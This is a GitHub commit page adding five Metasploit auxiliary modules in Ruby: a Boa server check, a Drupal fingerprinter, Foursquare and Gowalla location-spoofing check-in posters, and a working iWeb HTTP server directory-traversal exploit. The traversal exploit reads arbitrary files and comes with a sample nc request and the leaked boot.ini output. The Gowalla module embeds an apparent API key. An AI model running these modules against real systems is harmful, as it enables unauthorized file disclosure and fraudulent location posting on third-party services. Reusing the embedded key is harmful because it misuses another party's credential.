-
Notifications
You must be signed in to change notification settings - Fork 54
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
e5fe99a
commit a4a0287
Showing
8 changed files
with
659 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Original file line | Diff line number | Diff line change |
---|---|---|---|
@@ -0,0 +1,65 @@ | |||
## | |||
# This file is part of the Metasploit Framework and may be subject to | |||
# redistribution and commercial restrictions. Please see the Metasploit | |||
# Framework web site for more information on licensing and terms of use. | |||
# http://metasploit.com/framework/ | |||
## | |||
|
|||
|
|||
require 'msf/core' | |||
|
|||
|
|||
class Metasploit3 < Msf::Auxiliary | |||
|
|||
# Exploit mixins should be called first | |||
include Msf::Exploit::Remote::HttpClient | |||
include Msf::Auxiliary::WMAPScanServer | |||
# Scanner mixin should be near last | |||
#include Msf::Auxiliary::Scanner | |||
include Msf::Auxiliary::Report | |||
|
|||
def initialize | |||
super( | |||
'Name' => 'Boa Authentication Bypass Exploit', | |||
'Version' => '$Revision: $', | |||
'Description' => 'This module checks for your moms...', | |||
'Author' => ['CG'], | |||
'License' => MSF_LICENSE, | |||
'References' => | |||
[ | |||
[ 'URL', 'http://www.milw0rm.com/exploits/4542' ], | |||
[ 'URL', 'http://www.securityfocus.com/archive/1/479434'], | |||
] | |||
) | |||
|
|||
end | |||
|
|||
def run | |||
|
|||
|
|||
begin | |||
res = send_request_raw({ | |||
'version' => '1.1', | |||
'uri' => '/home/index.shtml', | |||
'method' => 'GET', | |||
}, 10) | |||
|
|||
if (res and res.headers['Server']) | |||
if res.headers['Server'] =~ /Boa/ | |||
print_status("#{datastore['RHOST']} is possibly vuln #{res.headers['Server']}\n Attempting to change password to blah:blah") | |||
elsif | |||
print_status("#{datastore['RHOST']} is not vuln #{res.headers['Server']}") | |||
end | |||
|
|||
else | |||
'' | |||
end | |||
|
|||
end | |||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout | |||
rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e | |||
puts e.message | |||
end | |||
end | |||
#end | |||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Original file line | Diff line number | Diff line change |
---|---|---|---|
@@ -0,0 +1,77 @@ | |||
## | |||
# This file is part of the Metasploit Framework and may be subject to | |||
# redistribution and commercial restrictions. Please see the Metasploit | |||
# Framework web site for more information on licensing and terms of use. | |||
# http://metasploit.com/framework/ | |||
## | |||
|
|||
|
|||
require 'msf/core' | |||
|
|||
|
|||
class Metasploit3 < Msf::Auxiliary | |||
|
|||
# Exploit mixins should be called first | |||
include Msf::Exploit::Remote::HttpClient | |||
include Msf::Auxiliary::WMAPScanServer | |||
# Scanner mixin should be near last | |||
#include Msf::Auxiliary::Scanner | |||
include Msf::Auxiliary::Report | |||
|
|||
def initialize | |||
super( | |||
'Name' => 'Drupal Check', | |||
'Version' => '$Revision: $', | |||
'Description' => 'This module check for the existence of the Drupal CMS by using the Expires: Sun, 19 Nov 1978 05:00:00 GMT header value. This should identify Drupal 4.6 and above. You MUST set the VHOST to be the domain name for this to work.', | |||
'Author' => ['CG'], | |||
'License' => MSF_LICENSE, | |||
'References' => | |||
[ | |||
[ 'URL', 'http://www.lullabot.com/articles/is-site-running-drupal' ], | |||
] | |||
) | |||
|
|||
register_options( | |||
[ | |||
OptString.new('UserAgent', [true, "The HTTP User-Agent sent in the request", 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' ]), | |||
OptString.new('VHOST', [true, "The VHOST -- Must set for this module", 'www.google.com' ]) | |||
], self.class) | |||
end | |||
|
|||
def run | |||
|
|||
|
|||
begin | |||
agent = datastore['UserAgent'] | |||
res = send_request_raw({ | |||
'version' => '1.0', | |||
'uri' => '/', | |||
'method' => 'GET', | |||
'headers' => | |||
{ | |||
'Accept' => '*/*', | |||
'Connection' => 'Keep-Alive', | |||
} | |||
|
|||
}, 10) | |||
|
|||
if (res and res.headers['Expires']) | |||
if res.headers['Expires'] =~ /Sun, 19 Nov 1978 05:00:00 GMT/ | |||
print_status("#{datastore['RHOST']} is running Drupal CMS\nServer response #{res.headers['Expires']}") | |||
elsif | |||
print_status("#{datastore['RHOST']} is not running Drupal CMS\nServer response #{res.headers['Expires']}") | |||
end | |||
|
|||
|
|||
else | |||
'' | |||
end | |||
|
|||
end | |||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout | |||
rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e | |||
puts e.message | |||
end | |||
end | |||
#end | |||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Original file line | Diff line number | Diff line change |
---|---|---|---|
@@ -0,0 +1,75 @@ | |||
## | |||
# This file is part of the Metasploit Framework and may be subject to | |||
# redistribution and commercial restrictions. Please see the Metasploit | |||
# Framework web site for more information on licensing and terms of use. | |||
# http://metasploit.com/framework/ | |||
## | |||
|
|||
require 'msf/core' | |||
|
|||
|
|||
class Metasploit3 < Msf::Auxiliary | |||
|
|||
# Exploit mixins should be called first | |||
include Msf::Exploit::Remote::HttpClient | |||
include Msf::Auxiliary::Report | |||
|
|||
def initialize | |||
super( | |||
'Name' => 'Foursquare Location Poster', | |||
'Version' => '$Revision:$', | |||
'Description' => 'Fuck with Foursquare, be anywhere you want to be by venue id', | |||
'Author' => ['CG'], | |||
'License' => MSF_LICENSE, | |||
'References' => | |||
[ | |||
[ 'URL', 'http://groups.google.com/group/foursquare-api' ], | |||
[ 'URL', 'http://www.mikekey.com/im-a-foursquare-cheater/'], | |||
] | |||
) | |||
#todo pass in geocoords instead of venueid, create a venueid, other tom foolery | |||
register_options( | |||
[ | |||
Opt::RHOST('api.foursquare.com'), | |||
OptString.new('VENUEID', [ true, 'foursquare venueid', '185675']), #Louve Paris France | |||
OptString.new('USERNAME', [ true, 'foursquare username', 'username']), | |||
OptString.new('PASSWORD', [ true, 'foursquare password', 'password']), | |||
], self.class) | |||
|
|||
end | |||
|
|||
def run | |||
|
|||
begin | |||
user = datastore['USERNAME'] | |||
pass = datastore['PASSWORD'] | |||
venid = datastore['VENUEID'] | |||
user_pass = Rex::Text.encode_base64(user + ":" + pass) | |||
decode = Rex::Text.decode_base64(user_pass) | |||
postrequest = "twitter=1\n" #add facebook=1 if you want facebook | |||
|
|||
print_status("Base64 Encoded User/Pass: #{user_pass}") #debug | |||
print_status("Base64 Decoded User/Pass: #{decode}") #debug | |||
|
|||
res = send_request_cgi({ | |||
'uri' => "/v1/checkin?vid=#{venid}", | |||
'version' => "1.1", | |||
'method' => 'POST', | |||
'data' => postrequest, | |||
'headers' => | |||
{ | |||
'Authorization' => "Basic #{user_pass}", | |||
'Proxy-Connection' => "Keep-Alive", | |||
} | |||
}, 25) | |||
|
|||
print_status("#{res}") #this outputs entire response, could probably do without this but its nice to see whats going on | |||
end | |||
|
|||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout | |||
rescue ::Timeout::Error, ::Errno::EPIPE =>e | |||
puts e.message | |||
end | |||
end | |||
|
|||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Original file line | Diff line number | Diff line change |
---|---|---|---|
@@ -0,0 +1,89 @@ | |||
## | |||
# This file is part of the Metasploit Framework and may be subject to | |||
# redistribution and commercial restrictions. Please see the Metasploit | |||
# Framework web site for more information on licensing and terms of use. | |||
# http://metasploit.com/framework/ | |||
## | |||
|
|||
require 'msf/core' | |||
|
|||
|
|||
class Metasploit3 < Msf::Auxiliary | |||
|
|||
# Exploit mixins should be called first | |||
include Msf::Exploit::Remote::HttpClient | |||
include Msf::Auxiliary::Report | |||
|
|||
def initialize | |||
super( | |||
'Name' => 'Gowalla Location Poster', | |||
'Version' => '$Revision:$', | |||
'Description' => 'Fuck with Gowalla, be anywhere you want to be by spot id', | |||
'Author' => ['CG'], | |||
'License' => MSF_LICENSE, | |||
'References' => | |||
[ | |||
[ 'URL', 'http://groups.google.com/group/foursquare-api' ], | |||
[ 'URL', 'http://www.mikekey.com/im-a-foursquare-cheater/'], | |||
] | |||
) | |||
#todo pass in geocoords instead of venueid, create a venueid, other tom foolery | |||
register_options( | |||
[ | |||
Opt::RHOST('api.gowalla.com'), | |||
OptString.new('UserAgent', [true, "Specify Gowalla UserAgent",'Gowalla/1.1 (unknown, Android, 4, android, 0.9.1, 320x480)']), | |||
#OptString.new('UserAgent', [true, "Specify Gowalla UserAgent",'Gowalla/1.1 (unknown, Android, 4, android-devphone1/Android Dev Phone 1, 0.9.1-73-g59c95ca, 320x480)']), | |||
OptString.new('SPOTID', [ true, 'gowalla spot id', '14515']), #Facebook HQ | |||
OptString.new('USERNAME', [ true, 'gowalla username', 'username']), | |||
OptString.new('PASSWORD', [ true, 'gowalla password', 'password']), | |||
OptString.new('GPSLONGITUDE', [ true, 'GPS Longitude', '-122.1525514126']), | |||
OptString.new('GPSLATITUDE', [ true, 'GPS Latitude', '37.4157602871']), | |||
OptString.new('GOWALLAAPIKEY', [ true, 'gowalla API Key', '4a35a8b7df6a405a816b01cd5b44b95d']), | |||
OptString.new('COMMENT', [ true, 'Comment', 'fooooood']), | |||
], self.class) | |||
|
|||
end | |||
|
|||
def run | |||
|
|||
begin | |||
user = datastore['USERNAME'] | |||
pass = datastore['PASSWORD'] | |||
spotid = datastore['SPOTID'] | |||
lng = datastore['GPSLONGITUDE'] | |||
lat = datastore['GPSLATITUDE'] | |||
api = datastore['GOWALLAAPIKEY'] | |||
comment = datastore['COMMENT'] | |||
|
|||
user_pass = Rex::Text.encode_base64(user + ":" + pass) | |||
decode = Rex::Text.decode_base64(user_pass) | |||
postrequest = "lng=#{lng}&accuracy=0.0&post_to_facebook=0&post_to_twitter=1&comment=#{comment}&lat=#{lat}\n" | |||
|
|||
print_status("Base64 Encoded User/Pass: #{user_pass}") #debug | |||
print_status("Base64 Decoded User/Pass: #{decode}") #debug | |||
|
|||
res = send_request_cgi({ | |||
'uri' => "/checkins?spot_id=#{spotid}", | |||
'version' => "1.1", | |||
'method' => 'POST', | |||
'data' => postrequest, | |||
'headers' => | |||
{ | |||
'Authorization' => "Basic #{user_pass}", | |||
'X-Gowalla-API-Version' => "1", | |||
'Accept' => 'application/json', | |||
'Proxy-Connection' => "Keep-Alive", | |||
'X-Gowalla-API-Key' => "#{api}" | |||
} | |||
}, 25) | |||
|
|||
print_status("#{res}") #this outputs entire response, could probably do without this but its nice to see whats going on | |||
end | |||
|
|||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout | |||
rescue ::Timeout::Error, ::Errno::EPIPE =>e | |||
puts e.message | |||
end | |||
end | |||
|
|||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Original file line | Diff line number | Diff line change |
---|---|---|---|
@@ -0,0 +1,77 @@ | |||
## | |||
# This file is part of the Metasploit Framework and may be subject to | |||
# redistribution and commercial restrictions. Please see the Metasploit | |||
# Framework web site for more information on licensing and terms of use. | |||
# http://metasploit.com/framework/ | |||
## | |||
|
|||
require 'msf/core' | |||
|
|||
|
|||
class Metasploit3 < Msf::Auxiliary | |||
|
|||
# Exploit mixins should be called first | |||
include Msf::Exploit::Remote::HttpClient | |||
# Scanner mixin should be near last | |||
include Msf::Auxiliary::Report | |||
|
|||
def initialize | |||
super( | |||
'Name' => 'iWeb HTTP Server Directory Transversal Vulnerability', | |||
'Version' => '$Revision: $', | |||
'Description' => 'This modules exploits the iWeb HTTP Server Directory Transversal Vulnerability', | |||
# some webcam shit has a similar Server Header see below for actual server header. | |||
# default install path C:\Progam Files\Ashley Brown\iWeb\ | |||
'Author' => 'CG' , | |||
'License' => MSF_LICENSE, | |||
'References' => | |||
[ | |||
[ 'URL', 'http://packetstormsecurity.org/0912-exploits/iweb-traversal.txt' ], | |||
[ 'BID', '37228' ], | |||
[ 'URL', 'http://www.ashleybrown.co.uk/iweb/' ], | |||
[ 'URL', 'http://www.exploit-db.com/exploits/10331' ] | |||
] | |||
) | |||
register_options( | |||
[ | |||
OptString.new('FILE', [ true, "The file to view", 'boot.ini']), | |||
OptString.new('TRAV', [ true, "Traversal Depth", '..%5C..%5C..%5C']), | |||
], self.class) | |||
end | |||
|
|||
def run | |||
|
|||
begin | |||
file = datastore['FILE'] | |||
trav = datastore['TRAV'] | |||
res = send_request_raw({ | |||
'uri' => '/'+trav+file, | |||
'method' => 'GET' | |||
}, 10) | |||
|
|||
if (res and res.code == 200) | |||
print_status("Output Of Requested File:\n#{res.body}") | |||
else | |||
print_status("Received #{res.code} for #{trav}#{file}") | |||
end | |||
|
|||
#rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout | |||
#rescue ::Timeout::Error, ::Errno::EPIPE | |||
end | |||
end | |||
|
|||
end | |||
|
|||
# nc 172.16.10.132 80 | |||
# GET ..%5C..%5C..%5Cboot.ini HTTP/1.0 | |||
|
|||
# HTTP/1.1 200 OK | |||
# LastModified: 12/22/2005 3:22:59 PM | |||
# Server: iWeb | |||
# Content-Length: 210 | |||
|
|||
# [boot loader] | |||
# timeout=30 | |||
# default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS | |||
# [operating systems] | |||
# multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Enterprise" /noexecute=optout /fastdetect |
Oops, something went wrong.